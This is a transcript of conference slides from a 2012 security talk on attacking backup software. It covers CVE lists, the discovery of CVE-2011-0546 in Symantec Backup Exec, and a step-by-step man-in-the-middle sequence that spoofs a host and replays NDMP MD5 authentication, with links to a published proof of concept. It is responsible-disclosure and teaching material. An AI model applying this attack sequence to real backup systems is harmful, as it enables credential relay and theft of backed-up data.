attacking backup softwares
DESCRIPTION
Presentation on "Attacking Backup Softwares" at nullcon2012, goaTRANSCRIPT
Attacking Backup SoftwaresNibin Varghese
iViZ Security
Agenda
Role of Backup Softwares History of backup software vulnerabilities Demonstration of Symantec Backup Exec
NDMP MiTM attack
Role of Backup Softwares
• “To protect valuable data”
From a security perspective, can we really rely on them ?
History of Backup Software vulnerabilities
Symantec Backup ExecCVE-2011-0547CVE-2011-0546CVE-2009-3027CVE-2009-0651CVE-2008-5407CVE-2008-5408CVE-2007-6016CVE-2007-6017CVE-2008-4339CVE-2008-2512CVE-2007-6016CVE-2007-6017CVE-2008-0457CVE-2007-4346CVE-2007-4347 and more…
HP Data Protector CVE-2011-3156CVE-2011-3157CVE-2011-3158CVE-2011-3159CVE-2011-3160CVE-2011-3161CVE-2011-3162CVE-2011-0921CVE-2011-0922CVE-2011-0923CVE-2011-0924CVE-2011-0514CVE-2011-2399 and more…
Why back up softwares are good targets ?
• Critical data’s are backed up to prevent loss
• What would be an attackers motivation ?
If I am looking for confidential information, do I have to pwn all the machines in a network?
OR
Look for a software that is trusted by all machines in a network
• Vulnerability in backup softwares are capable of providing the sweet spot to steal confidential informations.
I will demonstrate one such vulnerability
“CVE-2011-0546: Symantec Backup Exec NDMP MiTM Attack”
Symantec Backup Exec Software
• Short demo of the software• DMA or the client
• DSP or the server
CVE-2011-0546 Symantec Backup Exec NDMP MiTM Attack
• Timelines of disclosure• Bug discovered in early 2009
• Disclosed to the vendor in Jan’2010
• Vendor confirmation in Mar’2010
• Patch released on 26th May,2011
• iViZ advisory published on 27th May,2011
• PoC published to exploit-db in July, 2011
Hunt for the bug
• Started with survey of Symantec Backup Software
• Product sheets for features
• Closely looked at technologies it implements
• Available open ports for communication
• Short baby steps to fuzzing
• Blind fuzzing on open ports - Failed
• Fuzzing with captured packets - Failed
• Protocol based fuzzing (NDMP) - Failed
Hunt for the bug (cont)• What is Network Data Management Protocol (NDMP)?
• Based on client-server model
• Allows data transfers between various storage devices connected over a network
• Data channel and control channel
• Challenges in fuzzing NDMP
• Driven by a state machine
• Sequence of commands is important
• As part of my survey, I found an academic paper “Security Analysis of the NDMP Protocol”[1]ftp://ftp.heanet.ie/mirrors/sourceforge/n/project/nd/ndmfs/SecurityAnalysis/v1.0/Security_Analysis_of_the_NDMP_Protocol.pdf
Security Analysis of the NDMP Protocol
• Passive attacks on data channel
• If attacker has network access, he can capture data channel traffic
• Active Attacks
• NDMP uses sequence numbering with no message authentication.
• MiTM attack on NDMP MD5 auth schemeftp://ftp.heanet.ie/mirrors/sourceforge/n/project/nd/ndmfs/SecurityAnalysis/v1.0/
Security_Analysis_of_the_NDMP_Protocol.pdf
NDMP MD5 auth scheme
Client Server
Sends a request to authenticate
Server sends 64 byte challenge
Client sends hash of the credentials
Server authenticates the client
Executes post authenticated commands
MiTM attack on NDMP MD5 auth scheme
Client Server
Client request to authenticate
Server sends 64 byte challenge
Attacker
Attacker replays the request to authenticate
Attacker replays the 64 byte challenge
Client sends hash of the credentials Attacker replays hash
of the credentials
Authenticates the attacker
Executes post authenticated commands
Practical validation of MiTM attack
• Possible attack vector#1
• Objective is to impersonate as a client to server
• No ARP Poisoning
• Looking out for more clues at Symantec Backup Exec Software
• Two open ports• 6101/TCP at DMA
• 10000/TCP at DSP (NDMP)
Backup Exec Agent Browser at DMA
• Backup Exec Remote Agent (DSP) publishes host details to the media servers (which runs the DMA)
• NETBIOS name
• IP address.
• Establishes a TCP/IP socket connection to port 6101/TCP at the media server
• The packet is processed by the Backup Exec Agent Browser (benetns.exe) at DMA
Identifies the type of host
IP Address of the hostNetBIOS name of the host
Backup Exec Agent Browser at DMA
• Publish fake hosts by changing IP address
• DMA successfully processes the packet with no validations of source
• Even if it was a TCP packet and not a UDP packet
• Good enough for us to impersonate the attacker as a valid DSP
Combining both Attack Vectors
• Attack Vector#1
• MiTM attack on NDMP MD5 Auth
• Attack Vector#2
• Spoof valid DSP with attacker IP
• Result
• MiTM attack on Symantec Backup Exec to steal information from DSP
MiTM Attack Sequence
Attacker
1. Attacker publishes fake details to DMA@6101/TCP
2. Attacker starts a fake NDMP server@10000/TCP
3. Client connects to the fake server of attacker
4. Client requests for authentication5. Attacker connects to
Server@10000/TCP6. Attacker request for
authentication on Server7. Server sends challenge to
Attacker8. Attacker sends challenge to Client9. Client sends the authentication
credentials back to the attacker10. Attacker uses this credentials to
authenticate to the victim server11. Attacker is authenticated and
instructs to open a data channel12. Attacker opens an NDMP data
channelClient(DMA)
6101/TCP 10000/TCP
Server(DSP)
10000/TCP
Client requests for authentication
Attacker requests for authentication
Server sends challenge
Attacker sends challenge
Client sends credentials
Attacker sends credentials
Server authenticates attacker
Attacker opens a data channel
Ready for PoC Demo?
• Scope for PoC
• Exploit the weakness in NDMP to execute post authenticated commands
• Out of scope
• Reverse engineer all the proprietary NDMP commands
• Demo
References
• iViZ Security Advisory
http://www.ivizsecurity.com/security-advisory-iviz-sr-11001.html
• Symantec Advisory
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110526_00
• Security Analysis of NDMP Protocol
ftp://ftp.heanet.ie/mirrors/sourceforge/n/project/nd/ndmfs/SecurityAnalysis/v1.0/Security_Analysis_of_the_NDMP_Protocol.pdf
• NDMP Specification
http://www.ndmp.org/download/sdk_v4/draft-skardal-ndmp4-04.txt
• Exploit DB for PoC
http://www.exploit-db.com/exploits/17517/
Questions
Thank you
twitter.com/nibin012 github.com/nibin